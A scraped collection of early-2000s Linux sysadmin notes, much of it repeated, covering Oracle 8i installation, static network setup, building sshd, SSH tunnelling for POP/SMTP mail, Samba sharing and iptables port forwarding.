fprintf( stderr, "\nfailed loading %s\n", sh_lib);
exit(1);
}else{
shl_findsym( &handle, method, TYPE_UNDEFINED, &fp );
if( fp == NULL )
fprintf( stderr, "\nfailed getting method %s\n", method);
else
fp( 42 );
if ( shl_unload( handle ) != 0 )
fprintf( stderr, "\nfailed unloading %s\n", sh_lib);
}
exit(0);
}
------------------------- cut ----------------------
cc main.c -o main
The linux sample code should work for other UNIX flavours, which use dlopen()/dlsym(). Only HP-UX uses shl_load()/shl_findsym(). Please look at the man pages of cc and ld for the correct flags to be used for the particular version of UNIX.
Oracle 8i on Linux
This is a step by step guide to installing Oracle8i on Linux. The installation was successfully tested on Suse 6.4 , Redhat 6.2 and Caldera openLinux 2.4 using Oracle 8i Enterprise Edition Release 2 (8.1.6) for Linux (Intel) circa October 2000.
1.Installtion
2.Notes
3.Trouble Shooting
1.Installation
Download Java 1.1.6 ( JRE ) for Linux from www.java.sun.com/linux or from blackdown.org and Oracle 8i from oracle.com If you have the Oracle 8i CD download only the JRE.
[download the files to some directory like /tmp ]
$cd /tmp
$ls *.gz
jre_1.1.6-v5-glibc-x86.tar.gz
oracle8161_tar.gz
[ become root ]
$su
[ set up and install the jre ]
#cp /tmp/jre_1.1.6-v5-glibc-x86.tar.gz /usr/local/lib
#cd /usr/local/lib
#tar -xzvf jre_1.1.6-v5-glibc-x86.tar.gz
#ln -s /usr/local/lib/jre116_v5 /usr/local/lib/jre
#export PATH=$PATH:/usr/local/jre/bin
[ create user groups ]
#/usr/sbin/groupadd -g 111 oinstall
#/usr/sbin/groupadd -g 112 dba
[ create auser named oracle ]
#mkdir /home/oracle
#/usr/sbin/useradd -g dba -d /home/oracle oracle
#/usr/sbin/usermod -g dba -G oainstall oracle
#passwd oracle
#chown oracle /home/oracle
#chgrp dba /home/oracle
[ make some directories required during installtion ]
#mkdir -p /usr/local/oracle/8i && cd /usr/local/oracle/8i
#mkdir -p /usr/local/oracle/8i && cd /usr/local/oracle/8i
#mkdir {u01,u02,u03,u04}
#chown oracle:oinstall {u01,u02,u03,u04}
[ become user oracle ]
#su oracle
$cd
$pwd
/home/oracle
$
[ Create/Edit the file named /home/oracle/.bashrc
with the following contents : [ SEE NOTE 2]
ORACLE_HOME=/usr/local/oracle/8i/u01/app/oracle/product/8.1.5
ORACLE_BASE=/usr/local/oracle/8i/u01/app/oracle
export ORACLE_HOME ORACLE_BASE
NLS_LANG='english_united kingdom.we8iso8859p1'
ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data
ORACLE_TERM=vt100
LD_LIBRARY_PATH=$ORACLE_HOME/lib
PATH=$PATH:$ORACLE_HOME/bin:/usr/local/jre/bin
export NLS_LANG ORA_NLS33 PATH LD_LIBRARY_PATH
$vi .bashrc
$source .bashrc
[ NO CD - unzip and extract the downloaded files ]
$gunzip /tmp/oracle8161_tar.gz
$tar -xvf /tmp/oracle8161_tar
$cd /tmp/Oracle8iR2/install/linux
[ WITH CD - If not mounted mount the CD ] [ SEE NOTE 1 ]
#su
#mount -t iso9660 /dev/hdc /cdrom
#exit
#su oracle
$cd /cdrom/install/linux
[ start installation ]
$./runInstaller
During installation the installation program will prompt you a couple of times to run certain commands as root from a shell. It will also ask you to create an SID at the end of the installation.
Post Install:
$svrmgrl
>connect internal
>startup
$export ORACLE_SID=your_sid_name
$sqlplus scott/tiger
SQL>
SQl>select ename from emp;
2.Notes
1. Mounting CD
The mount command might be little different on diferent machines the third parameter the device file for CDROM [ /dev/hdc ] may not be the same on all machines. Please contact your friendly sysadmin for help.
Or if you have an X desktop environment like Gnome or KDE you can click on the CDROM icon it might mount the CDROM and will open the CDROM contents in a file explorer.
Some Linux distributions ( like Caldera open Linux ) will have the CD auto mounted at /auto/cdrom. in that case you just go to that directory to access the installation files you dont have to mount the CD.
2. Adding the .profile/.login/.bashrc
Usually the default shell for new user accounts on Linux is bash. So the file to add Oracle environment variables is usually .bashrc in the home directory /home/oracle. But if you are running another shell please contact your friendly sysadmin to find out which file to edit.
If you are not familiar with vi , please use any of the notepad like editors gedit,kedit,nedit .
3.Troubleshooting
1. Make sure you have set the Oracle environment variables correctly.
$su oracle
$cd
$pwd
/home/oracle
$source .bashrc
$env | grep -E 'ORACLE|NLS|LD'
NLS_LANG=english_united kingdom.we8iso8859p1
LD_LIBRARY_PATH=/usr/local/oracle/8i/u01/app/oracle/product/8.1.5/lib
ORACLE_BASE=/usr/local/oracle/8i/u01/app/oracle
ORA_NLS33=/usr/local/oracle/8i/u01/app/oracle/product/8.1.5/ocommon/nls/admin/data
ORACLE_HOME=/usr/local/oracle/8i/u01/app/oracle/product/8.1.5
$
Make sure the env command shows the above output, otherwise make sure you edited the /home/orcle/.bashrc file correctly.
2. Stale files from an aborted/failed installation
Sometimes the Oracle Universal Installer leaves behind stale files from an earlier failed installation as a different user.
One of the files left behind is /etc/oraInst.loc
#su
#cat /etc/oraInst.loc
inventory_loc=/home/user_name/oraInventory
inst_group=dba
#
[ where user_name is the user account from which the last failed installation was attempted ]
If you have this file hanging around you might get an error message saying no permissions to write /home/user_name/oraInventory . In that case become root and delete /etc/oraInst.loc file, and continue installation as user oracle.
1.Installtion
2.Notes
3.Trouble Shooting
1.Installation
Download Java 1.1.6 ( JRE ) for Linux from www.java.sun.com/linux or from blackdown.org and Oracle 8i from oracle.com If you have the Oracle 8i CD download only the JRE.
[download the files to some directory like /tmp ]
$cd /tmp
$ls *.gz
jre_1.1.6-v5-glibc-x86.tar.gz
oracle8161_tar.gz
[ become root ]
$su
[ set up and install the jre ]
#cp /tmp/jre_1.1.6-v5-glibc-x86.tar.gz /usr/local/lib
#cd /usr/local/lib
#tar -xzvf jre_1.1.6-v5-glibc-x86.tar.gz
#ln -s /usr/local/lib/jre116_v5 /usr/local/lib/jre
#export PATH=$PATH:/usr/local/jre/bin
[ create user groups ]
#/usr/sbin/groupadd -g 111 oinstall
#/usr/sbin/groupadd -g 112 dba
[ create auser named oracle ]
#mkdir /home/oracle
#/usr/sbin/useradd -g dba -d /home/oracle oracle
#/usr/sbin/usermod -g dba -G oainstall oracle
#passwd oracle
#chown oracle /home/oracle
#chgrp dba /home/oracle
[ make some directories required during installtion ]
#mkdir -p /usr/local/oracle/8i && cd /usr/local/oracle/8i
#mkdir -p /usr/local/oracle/8i && cd /usr/local/oracle/8i
#mkdir {u01,u02,u03,u04}
#chown oracle:oinstall {u01,u02,u03,u04}
[ become user oracle ]
#su oracle
$cd
$pwd
/home/oracle
$
[ Create/Edit the file named /home/oracle/.bashrc
with the following contents : [ SEE NOTE 2]
ORACLE_HOME=/usr/local/oracle/8i/u01/app/oracle/product/8.1.5
ORACLE_BASE=/usr/local/oracle/8i/u01/app/oracle
export ORACLE_HOME ORACLE_BASE
NLS_LANG='english_united kingdom.we8iso8859p1'
ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data
ORACLE_TERM=vt100
LD_LIBRARY_PATH=$ORACLE_HOME/lib
PATH=$PATH:$ORACLE_HOME/bin:/usr/local/jre/bin
export NLS_LANG ORA_NLS33 PATH LD_LIBRARY_PATH
$vi .bashrc
$source .bashrc
[ NO CD - unzip and extract the downloaded files ]
$gunzip /tmp/oracle8161_tar.gz
$tar -xvf /tmp/oracle8161_tar
$cd /tmp/Oracle8iR2/install/linux
[ WITH CD - If not mounted mount the CD ] [ SEE NOTE 1 ]
#su
#mount -t iso9660 /dev/hdc /cdrom
#exit
#su oracle
$cd /cdrom/install/linux
[ start installation ]
$./runInstaller
During installation the installation program will prompt you a couple of times to run certain commands as root from a shell. It will also ask you to create an SID at the end of the installation.
Post Install:
$svrmgrl
>connect internal
>startup
$export ORACLE_SID=your_sid_name
$sqlplus scott/tiger
SQL>
SQl>select ename from emp;
2.Notes
1. Mounting CD
The mount command might be little different on diferent machines the third parameter the device file for CDROM [ /dev/hdc ] may not be the same on all machines. Please contact your friendly sysadmin for help.
Or if you have an X desktop environment like Gnome or KDE you can click on the CDROM icon it might mount the CDROM and will open the CDROM contents in a file explorer.
Some Linux distributions ( like Caldera open Linux ) will have the CD auto mounted at /auto/cdrom. in that case you just go to that directory to access the installation files you dont have to mount the CD.
2. Adding the .profile/.login/.bashrc
Usually the default shell for new user accounts on Linux is bash. So the file to add Oracle environment variables is usually .bashrc in the home directory /home/oracle. But if you are running another shell please contact your friendly sysadmin to find out which file to edit.
If you are not familiar with vi , please use any of the notepad like editors gedit,kedit,nedit .
3.Troubleshooting
1. Make sure you have set the Oracle environment variables correctly.
$su oracle
$cd
$pwd
/home/oracle
$source .bashrc
$env | grep -E 'ORACLE|NLS|LD'
NLS_LANG=english_united kingdom.we8iso8859p1
LD_LIBRARY_PATH=/usr/local/oracle/8i/u01/app/oracle/product/8.1.5/lib
ORACLE_BASE=/usr/local/oracle/8i/u01/app/oracle
ORA_NLS33=/usr/local/oracle/8i/u01/app/oracle/product/8.1.5/ocommon/nls/admin/data
ORACLE_HOME=/usr/local/oracle/8i/u01/app/oracle/product/8.1.5
$
Make sure the env command shows the above output, otherwise make sure you edited the /home/orcle/.bashrc file correctly.
2. Stale files from an aborted/failed installation
Sometimes the Oracle Universal Installer leaves behind stale files from an earlier failed installation as a different user.
One of the files left behind is /etc/oraInst.loc
#su
#cat /etc/oraInst.loc
inventory_loc=/home/user_name/oraInventory
inst_group=dba
#
[ where user_name is the user account from which the last failed installation was attempted ]
If you have this file hanging around you might get an error message saying no permissions to write /home/user_name/oraInventory . In that case become root and delete /etc/oraInst.loc file, and continue installation as user oracle.
SETTING UP NETWORK ON LINUX [ for DSL / LAN ]
This is a MINI HOW-TO on setting up the network configurations to connect yout Linux box on to a DSL network. It also applies to setting up your machine on a LAN.
The configuration instructionsa are specific to Redhat Linux distro. There might be slight difference in the configuration files with other distros.
Get the IP Addresses
All you need from your DSL provider or your LAN sys-admin is the following set of IP addreses.
1. Your IP address
111.111.111.111
2. The Gateway IP address
222.222.222.222
3. The netmask
255.255.255.333
4. The DNS ( Primary and Secondary )
444.444.444.444
555.555.555.555
NOTE: The IP addresses above are just place holders please replace with your actual IP addresses.
1.Set up your IP ( 111.111.111.111 )
* add the following line to /etc/hosts
111.111.111 hostname
* Eg: If your machine was called kahlua:
$cat /etc/hosts
127.0.0.1 localhost localhost.localdomain
111.111.111.111 kahlua
2.Set up Gateway ( 222.222.222.222 )
* Edit the /etc/sysconfig/network file with:
GATEWAY="222.222.222.222"
* Eg: If your machine was called kahlua:
$cat /etc/sysconfig/network
NETWORKING=yes
FORWARD_IPV4="yes"
HOSTNAME="kahlua"
GATEWAY="222.222.222.222"
GATEWAYDEV="eth0"
3. Set up the netmask ( 255.255.255.333 ) and IP ( 111.111.111.111 )
* Edit /etc/sysconfig/network-scripts/ifcfg-eth0 with:
IPADDR="111.111.111.111"
NETMASK="255.255.255.333"
* Eg: If your machine has IP 111.111.111.111 :
$ cat /etc/sysconfig/network-scripts/ifcfg-eth0
DEVICE="eth0"
IPADDR="111.111.111.111"
NETMASK="255.255.255.333"
ONBOOT="yes"
BOOTPROTO="none"
IPXNETNUM_802_2=""
IPXPRIMARY_802_2="no"
IPXACTIVE_802_2="no"
IPXNETNUM_802_3=""
IPXPRIMARY_802_3="no"
IPXACTIVE_802_3="no"
IPXNETNUM_ETHERII=""
IPXPRIMARY_ETHERII="no"
IPXACTIVE_ETHERII="no"
IPXNETNUM_SNAP=""
IPXPRIMARY_SNAP="no"
IPXACTIVE_SNAP="no"
4. Set up the DNS ( 444.444.444.444 and 555.555.555 )
* Edit /etc/resolv.conf and add:
nameserver 444.444.444.444
nameserver 555.555.555.555
* Eg: If your machine was called kahlua
and your providers domain is called dslinc.net :
$ cat /etc/resolv.conf
domain dslinc.net
search kahlua
nameserver 444.444.444.444
nameserver 555.555.555.555
Now you should be all set. Just ping any server on the net and verify if everything works fine.
Fore more information, please read the how-to docs NET-3-HOWTO / NET3-4-HOWTO in your /usr/doc/HOWTO ( normal path for Redhat distros ). Or search the newsgroup postings or linux archives.
The configuration instructionsa are specific to Redhat Linux distro. There might be slight difference in the configuration files with other distros.
Get the IP Addresses
All you need from your DSL provider or your LAN sys-admin is the following set of IP addreses.
1. Your IP address
111.111.111.111
2. The Gateway IP address
222.222.222.222
3. The netmask
255.255.255.333
4. The DNS ( Primary and Secondary )
444.444.444.444
555.555.555.555
NOTE: The IP addresses above are just place holders please replace with your actual IP addresses.
1.Set up your IP ( 111.111.111.111 )
* add the following line to /etc/hosts
111.111.111 hostname
* Eg: If your machine was called kahlua:
$cat /etc/hosts
127.0.0.1 localhost localhost.localdomain
111.111.111.111 kahlua
2.Set up Gateway ( 222.222.222.222 )
* Edit the /etc/sysconfig/network file with:
GATEWAY="222.222.222.222"
* Eg: If your machine was called kahlua:
$cat /etc/sysconfig/network
NETWORKING=yes
FORWARD_IPV4="yes"
HOSTNAME="kahlua"
GATEWAY="222.222.222.222"
GATEWAYDEV="eth0"
3. Set up the netmask ( 255.255.255.333 ) and IP ( 111.111.111.111 )
* Edit /etc/sysconfig/network-scripts/ifcfg-eth0 with:
IPADDR="111.111.111.111"
NETMASK="255.255.255.333"
* Eg: If your machine has IP 111.111.111.111 :
$ cat /etc/sysconfig/network-scripts/ifcfg-eth0
DEVICE="eth0"
IPADDR="111.111.111.111"
NETMASK="255.255.255.333"
ONBOOT="yes"
BOOTPROTO="none"
IPXNETNUM_802_2=""
IPXPRIMARY_802_2="no"
IPXACTIVE_802_2="no"
IPXNETNUM_802_3=""
IPXPRIMARY_802_3="no"
IPXACTIVE_802_3="no"
IPXNETNUM_ETHERII=""
IPXPRIMARY_ETHERII="no"
IPXACTIVE_ETHERII="no"
IPXNETNUM_SNAP=""
IPXPRIMARY_SNAP="no"
IPXACTIVE_SNAP="no"
4. Set up the DNS ( 444.444.444.444 and 555.555.555 )
* Edit /etc/resolv.conf and add:
nameserver 444.444.444.444
nameserver 555.555.555.555
* Eg: If your machine was called kahlua
and your providers domain is called dslinc.net :
$ cat /etc/resolv.conf
domain dslinc.net
search kahlua
nameserver 444.444.444.444
nameserver 555.555.555.555
Now you should be all set. Just ping any server on the net and verify if everything works fine.
Fore more information, please read the how-to docs NET-3-HOWTO / NET3-4-HOWTO in your /usr/doc/HOWTO ( normal path for Redhat distros ). Or search the newsgroup postings or linux archives.
Installing ssh and sshd
Title: Installing ssh and sshd
Contributor: yudhax (neorganicz)
Last Update: Saturday Mart 20 01:30 EDT 2005
cd /usr/local
Get ftp://ftp.cis.fed.gov/pub/ssh/ssh-2.4.0.tar.gz
wget ftp://ftp.cis.fed.gov/pub/ssh/ssh-2.4.0.tar.gz
tar -xzvf ssh-2.4.0.tar.gz
cd ssh-2.4~.0
./configure
make
make install
# In /etc/rc.d/rc.local:
# SSH Startup
echo Starting SSH Daemon
/usr/local/sbin/sshd
# Start sshd for the first time:
/usr/local/sbin/sshd
# Your done! now just:
ssh machine_name
Contributor: yudhax (neorganicz)
Last Update: Saturday Mart 20 01:30 EDT 2005
cd /usr/local
Get ftp://ftp.cis.fed.gov/pub/ssh/ssh-2.4.0.tar.gz
wget ftp://ftp.cis.fed.gov/pub/ssh/ssh-2.4.0.tar.gz
tar -xzvf ssh-2.4.0.tar.gz
cd ssh-2.4~.0
./configure
make
make install
# In /etc/rc.d/rc.local:
# SSH Startup
echo Starting SSH Daemon
/usr/local/sbin/sshd
# Start sshd for the first time:
/usr/local/sbin/sshd
# Your done! now just:
ssh machine_name
SSH Tunnell using POP3 for IMAP Mail
Who wants to read this
If you have a POP mail account on a remote server, provided by your ISP/work/school and wants to access your mails from your home/local machine through a secure channel.
Please note I will be reffering to POP3 as just POP throughout this article.
Why Secure POP
The normal POP communcations sends everything in clear text, including your mail account passwords. We need to use a secure channel, where everything will be encrypted between your local machine and the remote mail server. The rational is analogous to the use of encrypted HTTPS versus the normal HTTP communication when we access secure webservices.
Check for IMAP with SSL support
IMAP with SSL encrypts the mail communications the same way HTTPS encrypts the website communications. Sadly not all mail servers support this. ( My ISP replied to me "at this time we do not provide SSL mail due to stability issues in current implementations" )
If you have SSL mail, all you need to do is configure your mail tool to use SSL. All the popular mail clients like Mozilla/Netscape Mail, Eudora , Outlook Express etc supports SSL. The SSL option may not be On by default so please edit the Configuration/Settings of your mail client to use SSL.
On Mozilla 0.95/Netscape6.x Mail :
Select Menu:
Mail -> Mail & Newsgroups Account Settings
From the popup Dialog:
Select "Server Settings", Check "Use Secure connection (SSL) "
Select "Outgoing server (SMTP)" , Check "Always" for "Use secure connection ( SSL)"
If your remote server supports SSH
If you dont know much about SSH, please google the web for more information and then download and install SSH on your local machine. Most of the Linux machines should have it already installed.
If you already use SSH ( like as a secure replacement for telnet/ftp ) and just want to know about POP through SSH then jump ahead to the SSH tunnelling section.
The following instructions are for Linux/Unix. But the concept is the same for other platforms as well. Instead of the command line invocations, you might use a GUI application.
Run ssh with the hostname or IP address of the mail server. If you get the following response you cannot use SSH.
$ ssh mail.remoteserver
ssh: connect to address xxx.xxx.xxx.xxx port 22: Connection refused
$
If you can connect to the remote server using SSH, then we can setup a secure tunnell through SSH for your POP communications. The tunnell connects a port on your local machine ( say 1234 ) to the POP3 port ( port 110 ) of your remote server.
$ ssh -P -f -L 1234:remoteserver:110 user@remoteserver sleep 25
-L specifies the port forwarding 1234 on local machine to 110 od remoteserver.
-f tells SSH to fork out and run in the background.
-P option allows us ti open a non privilaged port - like 1234 - which does not require root access ( ports higher than 1024 ).
"sleep 25" is the command to execute at the remote server so as long as the command is executing at the server the tunnell will be kept open. In the example the connection will be open for 25 seconds, you can specify any duration to sleep.
This is called port forwarding in technical jargon, which means the local port on your machine will just forward any communication coming there to the POP server port. So in the mail tool when we configure the mail server name instead of the remoteserver:110 we will say localhost:12345
Now you have the POP tunnell yo get your mail to your local machine. Now if you want to send a mail for your mail through the SMTP server on the remote machine you can setup another secure tunnell to the SMTP port ( port 25 ) of the remote mail server as follows.
$ ssh -P -f -L 1235:remoteserver.net:25
user@remoteserver sleep 25
Test the tunnell
Once you have setup the the tunnel as explained above, test whether they are connecting correctly by telnetting to the tunnell ports.
First test the incoming POP tunnel. After connecting if you see the name of your remote server then your tunnell is working. Press the escape charecter "ctrl+]" to get to telnet prompt and then type "close" to exit.
$ telnet localhost 1234
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
+OK QPOP (version 3.1.2) at remoteserver.net starting.
^]
telnet> close
Connection closed.
$
Now check the same for the outbound tunnell. Type "quit" to close connection.
$ telnet localhost 1235
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
220 remoteserver.net ESMTP Sendmail 8.8.6/8.8.2; Thu, 6 Dec 2001 22:24:54 -0800
quit
Connection closed by foreign host.
$
Mail tool configuration
In the settings/configuration for incoming POP server pleasee specify localhost as the server and 1234 as the port. For outgoing SMTP mail server please specify localhost and 4321 as server and the port. And make sure you enable the tunnels before getting sending the mail.
One click tunnelling
I have put the above commands into shellscripts for convenience. And to make it even easier I have created a desktop shortcut on my linux workstation, which will bring up the scripts inside a small xterm window. So whenever I need to get or send mail, I just click on the desktop icon and type in the password/passphrase on the xterm that pops up with the tunnell script.
These are the scripts I use , you can either use these or create your own which suits your needs.
$cat getmail.sh
#/bin/sh
DELAY=300
ps -ef | grep -i ssh | grep 1234 | grep -v grep | grep -v sshd
echo ""
ssh -P -f -L 1234:mail.foo.net:110 user@foo.net sleep $DELAY
sleep $DELAY
$
$cat putmail.sh
#/bin/sh
DELAY=300 ps -ef | grep -i ssh | grep 1235 | grep -v grep | grep -v sshd
echo ""
ssh -P -f -L 1235:mail.foo.net:25 user@foo.net sleep $DELAY
sleep $DELAY
$
$cat tunnel.sh
#/bin/sh
xterm -geometry 60x5+60+10 -bg red -fg white -T
'local:1234]==[110:mail.foo.net]' -e /home/foo/bin/getmail.sh &
xterm -geometry 60x5+60+110 -bg green -fg black -T
'local:4321]==[ 25:mail.foo.net]' -e /home/foo/bin/putmail.sh &
$
If you have a POP mail account on a remote server, provided by your ISP/work/school and wants to access your mails from your home/local machine through a secure channel.
Please note I will be reffering to POP3 as just POP throughout this article.
Why Secure POP
The normal POP communcations sends everything in clear text, including your mail account passwords. We need to use a secure channel, where everything will be encrypted between your local machine and the remote mail server. The rational is analogous to the use of encrypted HTTPS versus the normal HTTP communication when we access secure webservices.
Check for IMAP with SSL support
IMAP with SSL encrypts the mail communications the same way HTTPS encrypts the website communications. Sadly not all mail servers support this. ( My ISP replied to me "at this time we do not provide SSL mail due to stability issues in current implementations" )
If you have SSL mail, all you need to do is configure your mail tool to use SSL. All the popular mail clients like Mozilla/Netscape Mail, Eudora , Outlook Express etc supports SSL. The SSL option may not be On by default so please edit the Configuration/Settings of your mail client to use SSL.
On Mozilla 0.95/Netscape6.x Mail :
Select Menu:
Mail -> Mail & Newsgroups Account Settings
From the popup Dialog:
Select "Server Settings", Check "Use Secure connection (SSL) "
Select "Outgoing server (SMTP)" , Check "Always" for "Use secure connection ( SSL)"
If your remote server supports SSH
If you dont know much about SSH, please google the web for more information and then download and install SSH on your local machine. Most of the Linux machines should have it already installed.
If you already use SSH ( like as a secure replacement for telnet/ftp ) and just want to know about POP through SSH then jump ahead to the SSH tunnelling section.
The following instructions are for Linux/Unix. But the concept is the same for other platforms as well. Instead of the command line invocations, you might use a GUI application.
Run ssh with the hostname or IP address of the mail server. If you get the following response you cannot use SSH.
$ ssh mail.remoteserver
ssh: connect to address xxx.xxx.xxx.xxx port 22: Connection refused
$
If you can connect to the remote server using SSH, then we can setup a secure tunnell through SSH for your POP communications. The tunnell connects a port on your local machine ( say 1234 ) to the POP3 port ( port 110 ) of your remote server.
$ ssh -P -f -L 1234:remoteserver:110 user@remoteserver sleep 25
-L specifies the port forwarding 1234 on local machine to 110 od remoteserver.
-f tells SSH to fork out and run in the background.
-P option allows us ti open a non privilaged port - like 1234 - which does not require root access ( ports higher than 1024 ).
"sleep 25" is the command to execute at the remote server so as long as the command is executing at the server the tunnell will be kept open. In the example the connection will be open for 25 seconds, you can specify any duration to sleep.
This is called port forwarding in technical jargon, which means the local port on your machine will just forward any communication coming there to the POP server port. So in the mail tool when we configure the mail server name instead of the remoteserver:110 we will say localhost:12345
Now you have the POP tunnell yo get your mail to your local machine. Now if you want to send a mail for your mail through the SMTP server on the remote machine you can setup another secure tunnell to the SMTP port ( port 25 ) of the remote mail server as follows.
$ ssh -P -f -L 1235:remoteserver.net:25
user@remoteserver sleep 25
Test the tunnell
Once you have setup the the tunnel as explained above, test whether they are connecting correctly by telnetting to the tunnell ports.
First test the incoming POP tunnel. After connecting if you see the name of your remote server then your tunnell is working. Press the escape charecter "ctrl+]" to get to telnet prompt and then type "close" to exit.
$ telnet localhost 1234
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
+OK QPOP (version 3.1.2) at remoteserver.net starting.
^]
telnet> close
Connection closed.
$
Now check the same for the outbound tunnell. Type "quit" to close connection.
$ telnet localhost 1235
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
220 remoteserver.net ESMTP Sendmail 8.8.6/8.8.2; Thu, 6 Dec 2001 22:24:54 -0800
quit
Connection closed by foreign host.
$
Mail tool configuration
In the settings/configuration for incoming POP server pleasee specify localhost as the server and 1234 as the port. For outgoing SMTP mail server please specify localhost and 4321 as server and the port. And make sure you enable the tunnels before getting sending the mail.
One click tunnelling
I have put the above commands into shellscripts for convenience. And to make it even easier I have created a desktop shortcut on my linux workstation, which will bring up the scripts inside a small xterm window. So whenever I need to get or send mail, I just click on the desktop icon and type in the password/passphrase on the xterm that pops up with the tunnell script.
These are the scripts I use , you can either use these or create your own which suits your needs.
$cat getmail.sh
#/bin/sh
DELAY=300
ps -ef | grep -i ssh | grep 1234 | grep -v grep | grep -v sshd
echo ""
ssh -P -f -L 1234:mail.foo.net:110 user@foo.net sleep $DELAY
sleep $DELAY
$
$cat putmail.sh
#/bin/sh
DELAY=300 ps -ef | grep -i ssh | grep 1235 | grep -v grep | grep -v sshd
echo ""
ssh -P -f -L 1235:mail.foo.net:25 user@foo.net sleep $DELAY
sleep $DELAY
$
$cat tunnel.sh
#/bin/sh
xterm -geometry 60x5+60+10 -bg red -fg white -T
'local:1234]==[110:mail.foo.net]' -e /home/foo/bin/getmail.sh &
xterm -geometry 60x5+60+110 -bg green -fg black -T
'local:4321]==[ 25:mail.foo.net]' -e /home/foo/bin/putmail.sh &
$
SAMBA - Windows Linux file Sharing Notes
Simple SAMBA on LINUX Sharing
Some basic notes on using SAMBA on a home network with linux and windows machines, like my home network setup.
Running SAMBA on a Linux machine
To start, stop or restart samba,
/etc/init.d/smd start
/etc/init.d/smd stop
/etc/init.d/smd restart
All options for the SAMBA goes to /etc/samba/smb.conf This is my smb.conf
Notable changes I made are:
My linux machine is a gateway server with two ethernet interfaces eth0 and eth1. For security reasons I set up SAMBA to run only on the internal interface
interfaces = 192.168.0.1/24 127.0.0.1/24
bind interfaces only = Yes
Also set hosts allow to only allow internal and localhoist
hosts allow = 127. 192.168.0.
hosts deny = *
SAMBA authentification
For the file access permissions for the shares to work, you have to set up the SAMBA username/password by running smbpasswd program on the linux box.
Then on the Windows machine login with the username/password created above with smbpasswd. Otherwise the file sharing will not work.
SAMBA Linux to Windows Sharing
Set up the shares in /etc/samba/smb.conf as follows
[musak]
comment = music from linux boxen
path = /var/stuff/media/musak
read only = Yes
On the windows machine access it as \\192.168.0.1\musak where 192.168.0.1 is the IP address of the linux machine.
If you want to share CD/DVD drive
[dvd]
comment = dvd drive on linux boxen
writable = No
locking = No
path = /mnt/cdrom2
SAMBA Windows to Linux Sharing
First turn on file sharing. Go to Start->Setting->Control Panel and open "Network" and in the first tab called "Configuration" click on "File and Pring Sharing..." and om the Dialog Box that comes up check "I want to be able to give others access to my files"
Now go to the file explorer and right click on the folder you want to sgare, and from the menu that pops up slect "Sharing..." and from the "Manual Properties" Dialog Box that comes up select the second tab "Sharing" and select "Shared as" which will enable all the text boxes, fill in the "Share Name" "Comments" and selct "Read Only" "Full" or "Depends on Password" and enter a password. This is the password that will give access to this share. Also note the "Share Name", lets name it "MYSHARE".
Also find out the hostname of the Windows machine. Go to Start->Setting->Control Panel and Open "Network" and in the second tab "Identification" note the "Computer Name", This is the name to use from Linux to access shares on this machine. Let it be "MYWINBOX"
Now go to the Linux machine. Crete mount point for the share.
mkdir /mnt/winstuff
Mount the share named "MYSHARE" on Windows hos namedt "MYWINBOX"
smbmount \\MYWINBOX\MYSHARE /mnt/winstuff
This will prompt you for the password for the share, enter the password and after that if you go to /mnt/winstuff you can access all files on the Windows folder.
Some basic notes on using SAMBA on a home network with linux and windows machines, like my home network setup.
Running SAMBA on a Linux machine
To start, stop or restart samba,
/etc/init.d/smd start
/etc/init.d/smd stop
/etc/init.d/smd restart
All options for the SAMBA goes to /etc/samba/smb.conf This is my smb.conf
Notable changes I made are:
My linux machine is a gateway server with two ethernet interfaces eth0 and eth1. For security reasons I set up SAMBA to run only on the internal interface
interfaces = 192.168.0.1/24 127.0.0.1/24
bind interfaces only = Yes
Also set hosts allow to only allow internal and localhoist
hosts allow = 127. 192.168.0.
hosts deny = *
SAMBA authentification
For the file access permissions for the shares to work, you have to set up the SAMBA username/password by running smbpasswd program on the linux box.
Then on the Windows machine login with the username/password created above with smbpasswd. Otherwise the file sharing will not work.
SAMBA Linux to Windows Sharing
Set up the shares in /etc/samba/smb.conf as follows
[musak]
comment = music from linux boxen
path = /var/stuff/media/musak
read only = Yes
On the windows machine access it as \\192.168.0.1\musak where 192.168.0.1 is the IP address of the linux machine.
If you want to share CD/DVD drive
[dvd]
comment = dvd drive on linux boxen
writable = No
locking = No
path = /mnt/cdrom2
SAMBA Windows to Linux Sharing
First turn on file sharing. Go to Start->Setting->Control Panel and open "Network" and in the first tab called "Configuration" click on "File and Pring Sharing..." and om the Dialog Box that comes up check "I want to be able to give others access to my files"
Now go to the file explorer and right click on the folder you want to sgare, and from the menu that pops up slect "Sharing..." and from the "Manual Properties" Dialog Box that comes up select the second tab "Sharing" and select "Shared as" which will enable all the text boxes, fill in the "Share Name" "Comments" and selct "Read Only" "Full" or "Depends on Password" and enter a password. This is the password that will give access to this share. Also note the "Share Name", lets name it "MYSHARE".
Also find out the hostname of the Windows machine. Go to Start->Setting->Control Panel and Open "Network" and in the second tab "Identification" note the "Computer Name", This is the name to use from Linux to access shares on this machine. Let it be "MYWINBOX"
Now go to the Linux machine. Crete mount point for the share.
mkdir /mnt/winstuff
Mount the share named "MYSHARE" on Windows hos namedt "MYWINBOX"
smbmount \\MYWINBOX\MYSHARE /mnt/winstuff
This will prompt you for the password for the share, enter the password and after that if you go to /mnt/winstuff you can access all files on the Windows folder.
PORT FORWARDING - with IPTABLES while using BASTILLE firewall
Background on network setup
I have my home network setup as described here. So my linux gateway server is the only one visible to the internet, while all other machines are in an internal subnet with DHCP assigned IP's not visible to the outside internet, but can access the outside net using Iptables based Network Address Translation (NAT).
Why you need portforwarding
So in this setup if I want to run a public service like httpd, not on the gateway server ( where it is visible to outside ) but on an internal machine ( which is not visible outside ) how do I make it availble to the outside internet.
To make the above scenario of exposing and internal machine's service to outside we need to use port forwarding on the gateway server. Which is assigning a port on the gateway to accept all connections and forward it to the internal machines port where the service is listening to.
Let xxx.xxx.xxx.xxx be the IP address of the gateway server connected to the cable modem and 192.168.0.2 , the IP address of the internal machine. And say we want to run a web server ( httpd ) on 192,168.0.2 on port 80 which should be avaialble to the outside internet. We can forward the port 80 on xxx.xxx.xxx.xxx to port 80 of 192.168.0.2
Source: xxx.xxx.xxx.xxx:80 -- forwarded to -> 192.168.0.2:80
You can chhose any port on xxx.xxx.xxx.xxx it need not match the port we are forwarding to.
